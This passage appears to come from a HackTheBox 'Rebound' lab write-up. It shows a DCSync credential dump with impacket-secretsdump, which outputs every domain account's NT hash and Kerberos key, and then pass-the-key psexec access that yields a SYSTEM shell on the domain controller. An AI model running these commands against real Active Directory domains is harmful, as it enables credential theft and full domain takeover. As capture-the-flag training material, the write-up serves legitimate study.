DCSync
Using the TGT of the dc01$ account, DCSync attack can be perform as the host itself
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=dc01\$.ccache impacket-secretsdump 'rebound.htb/dc01$@dc01.rebound.htb' -k -no-pass -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:4ea3a31438d84c0cc5e29c8a1773437f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
krbtgt:aes256-cts-hmac-sha1-96:97d63bd13c99edc3e88d42e2e964246a556cced73db6a75219632cdf9a32e192
krbtgt:aes128-cts-hmac-sha1-96:3c2069c0e7aff8ccceddd9b4f533ab2d
krbtgt:des-cbc-md5:2ae5bfc82c7c46cb
ppaul:aes256-cts-hmac-sha1-96:121c70ec57e22ce2752027163d0f7482932d239609194cef652783bc1f1eb2ea
ppaul:aes128-cts-hmac-sha1-96:4ec3a78a5111ca282ab87692d51c4150
ppaul:des-cbc-md5:d354b098136ec726
llune:aes256-cts-hmac-sha1-96:7e8e0bd4dd39ccf4060ca780944c379d975dbd2d4c438db63b21614578ec6384
llune:aes128-cts-hmac-sha1-96:9a7afe8a130f2b9f44309c5c357df71b
llune:des-cbc-md5:a7d0b08310769ebc
fflock:aes256-cts-hmac-sha1-96:5edee5abe58354f436b85a1ea2855319effb6dfa8689fb42c6eaf91662cbf42e
fflock:aes128-cts-hmac-sha1-96:d1c5c3d0734a4c107c1ae0f2eaeb7927
fflock:des-cbc-md5:26b9b9044ca77373
jjones:aes256-cts-hmac-sha1-96:142d9a8b57934fd16ab2e91998279892de9a02e53663babe319c79eedcd29d91
jjones:aes128-cts-hmac-sha1-96:0d09e595b77fe71177925d645b085ee1
jjones:des-cbc-md5:43f8d93291526bda
mmalone:aes256-cts-hmac-sha1-96:b0c89ffdd5af3cc44a79d28d8b6b8735ed09d697ee6f1bc497008abb5a669fe2
mmalone:aes128-cts-hmac-sha1-96:0511a2d3d7214b21a367bc108f6b7ec7
mmalone:des-cbc-md5:23c2ba0be5e98525
nnoon:aes256-cts-hmac-sha1-96:347e911d23f4fb27d5d64dfbdd90ca6b1de7b345f3cafb89dc4b3a9b84508249
nnoon:aes128-cts-hmac-sha1-96:2479824ed08e2b6776483878e5260421
nnoon:des-cbc-md5:26070be583b00e2f
ldap_monitor:aes256-cts-hmac-sha1-96:f259e938b7fd99f96dd0f6dae29ed97d362091df468278556b77ede6d93306c7
ldap_monitor:aes128-cts-hmac-sha1-96:9974760e486e60edda8fa9a71f6fe5fc
ldap_monitor:des-cbc-md5:3b3d4632083e1361
oorend:aes256-cts-hmac-sha1-96:e8841ae154446f8571ac993b8ce989d14e5c31dc8dbfa00f7eb47652609e2048
oorend:aes128-cts-hmac-sha1-96:5f028e7498cadeb751342cfe73a8959a
oorend:des-cbc-md5:19a858d3973df716
winrm_svc:aes256-cts-hmac-sha1-96:886a948e85ab132a30e88c70bb56c3c5294b4f57708b480625af7ae12fc374a1
winrm_svc:aes128-cts-hmac-sha1-96:096f92b7f71828012f8e26f861d4254b
winrm_svc:des-cbc-md5:10894032252a6707
batch_runner:aes256-cts-hmac-sha1-96:b3c35b6d874a958fcce2d2609578097d570ab6eefbc313428c7b49ff9ff69dcb
batch_runner:aes128-cts-hmac-sha1-96:b1841a1db708b64f7395c6c77759b32e
batch_runner:des-cbc-md5:a7d5523dc80ec402
tbrady:aes256-cts-hmac-sha1-96:5c634afa0ffaf0ad3ac04fdd47ffd995362b17b6260172644f3723cfcd3d280f
tbrady:aes128-cts-hmac-sha1-96:a33995844f38022195e60c880e2c8efc
tbrady:des-cbc-md5:46fbdcc22c437fcd
DC01$:aes256-cts-hmac-sha1-96:5cfcef579e83b6b3f8d29dac49ed7b3ee9b43c129600ce55a7d915b7456198c0
DC01$:aes128-cts-hmac-sha1-96:73f487f2cfddcdf50dc5349c836e2ea6
DC01$:des-cbc-md5:0eba19c2f4081619
delegator$:aes256-cts-hmac-sha1-96:d3a9b6d71b3d20b587a56f1d165fdb73761aa971c3fc1f43218b50007241b081
delegator$:aes128-cts-hmac-sha1-96:d5664a49f2877932d23d1842013476f0
delegator$:des-cbc-md5:3b68254c52584f3d
[*] Cleaning up... Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-psexec rebound.htb/administrator@dc01.rebound.htb -no-pass -aesKey 32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1 -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc01.rebound.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OsqJVewi.exe
[*] Opening SVCManager on dc01.rebound.htb.....
[*] Creating service VKqu on dc01.rebound.htb.....
[*] Starting service VKqu.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.4720]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
dc01
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.11.231
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : 10.10.10.2System Level Compromise
admin NT hash 176be138594933bb67db3b2572fc91b8